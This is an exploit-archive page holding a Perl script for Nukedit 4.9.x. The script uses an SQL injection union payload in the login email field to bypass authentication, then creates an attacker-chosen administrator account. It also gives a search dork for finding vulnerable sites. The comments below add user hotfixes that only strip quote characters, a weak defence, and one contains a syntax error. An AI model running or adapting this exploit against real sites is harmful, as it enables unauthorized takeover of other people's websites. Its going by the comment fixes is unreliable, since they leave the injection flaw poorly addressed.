Nukedit 4.9.x Remote Create Admin Exploit
Author:	r3dm0v3
Date:	2008-02-26
Download:

#!/usr/bin/perl
###########################################################
#Title:       Nukedit 4.9.x Create Admin Exploit          #
#                                                         #
#Credit:      r3dm0v3                                     #
#             http://r3dm0v3.persianblog.ir               #
#             r3dm0v3[4t]yahoo[dot]com                    #
#             Tehran - Iran                               #
#                                                         #
#Download:    http://www.nukedit.com/content/Download.asp #
#Vulnerables: 4.9.x, prior versions maybe affected.       #
#Remote:      Yes                                         #
#Dork:        "Powered by Nukedit"                        #
#Fix:         Not Available                               #
###########################################################
 
use LWP::UserAgent;
use HTTP::Cookies;
 
 
$host = $ARGV[0];
if (substr($host,length($host)-1,1) ne "/"){
    $host.="/";
}
$usrmail = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;
$usrSQL= "' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x";
 
 
&Banner();
if (@ARGV < 3) {
&Usage();
exit(1);
}
 
 
print "[~] Host: $host \n";
print "[~] Email/Password: $usrmail/$passwd\n";
print "[~] Logging in...\n";
 
 
$xpl = LWP::UserAgent->new() || die;
$cookie_jar = HTTP::Cookies->new();
 
$xpl->cookie_jar( $cookie_jar );
$res = $xpl->post($url.'utilities/login.asp',
Content => [
"redir"        => "/nukedit/default.asp",
"email"        => "$usrSQL",
"password"     => "r3dm0v3",
"savepassword" => "false",
"submit"       => "Login",
],);
 
 
 
if ($res->content =~ /Object Moved/){
    print "[+] Logged in\n";
}else{
    print "[-] Can not login!\n";
    exit();
}
 
 
print "[~] Creating Admin...\n";
 
 
$res = $xpl->post($url.'utilities/useradmin.asp',
Content => [
"action"          => "addDB",
"username"        => "r3dm0v3",
"company"         => "red move",
"url"             => "http://r3dm0v3.persianblog.ir",
"address"         => "a",
"county"          => "b",
"zip"             => "666",
"country"         => "Iran",
"phone"           => "66666666",
"fax"             => "12345678",
"email"           => "$usrmail",
"password"        => "$passwd",
"groupid"         => "1",
"submit1"         => "Add User >>",
"IP"              => "127.0.0.2",
],);
 
 
if ($res->content =~ /Object Moved/){
    print "[+] Admin added. Login info:\n".
          "    email:    $usrmail\n".
          "    password: $passwd\n";
}else{
    print "[-] Exploit failed!\n";
    print $res->content;
}
 
 
 
sub Banner{
print "############################################################\n".
      "#            Nukedit 4.9.x Create Admin Exploit            #\n".
      "#                       by r3dm0v3                         #\n".
      "#                  r3dm0v3[4t]yahoo[.]com                  #\n".
      "#               http://r3dm0v3.persianblog.ir              #\n".
      "############################################################\n";
}
 
 
sub Usage(){
print "\n Usage: nukedit.pl <host&path> <email> <password>\n";
print " ex.  : nukedit.pl site.com/nukedit/ myname\@somewhere.com 123456\n";
}
 

Comments (6)

Subscribe to this comment's feed

Show/Hide comments

Hotfix for this Problem
written by Roger , April 07, 2008

I developped a Hotfix for this issue:

Replace the code in login.asp
OLD CODE
*******************************************3
if(len(email) > 0) then
set rsCheck = db.execute("select * from tblUsers where email = '" & email & "'")
if(not rsCheck.EOF) then
if (password=rsCheck("password"))
NEW CODE
*******************************************3
if(len(email) > 0) then
email = replace(email, "'","")
email = replace(email, ",","")

set rsCheck = db.execute("select * from tblUsers where email = '" & email & "'")
if(not rsCheck.EOF) then

if (password=rsCheck("password") and (email=rsCheck("email"))) then

Greetings Roger

report abuse

vote down

vote up

Votes: +1

...
written by gurpal , April 08, 2008

thanks for the hotfix hopefull it should work.
regards
and thanks again

report abuse

vote down

vote up

Votes: +0

...
written by gurpalsc , April 08, 2008

thanks for the hotfix

report abuse

vote down

vote up

Votes: +0

...
written by Brad , April 08, 2008

Thanks a million for this there are hotfixes but they dot sem to do the job... Hopefully this stops the buggers, from screwing me weekly.

Thanks again

report abuse

vote down

vote up

Votes: +0

...
written by Mike , April 15, 2008

you may find that your hotfix doesnt stop the password field from having SQL injected into it. This is what i wrote and stuck it in the same place as they guy lists above. In my code im protecting both the Email and the Password fields.

'************ SQL Injection fix

'********* removing any errant ' in the fields as these could be SQL injection attempts.


email = replace(email,"'","")
email = replace(email,""","")

password = replace(password,"'","")
password = replace(password,""","")

'removing ' and "

' ********* end of sql injection fix

if(len(email) > 0) then

report abuse

vote down

vote up

Votes: +1

...
written by Roger , April 21, 2008

But i think to protect the password is not needed because it's not used in the SQL-Execute statement.
Right?

report abuse

vote down

vote up

Votes: +0

Show/Hide comment form

Write comment

Name

Email

Website

Title

Comment

smaller | bigger

Subscribe via email (Registered users only)

Add Comment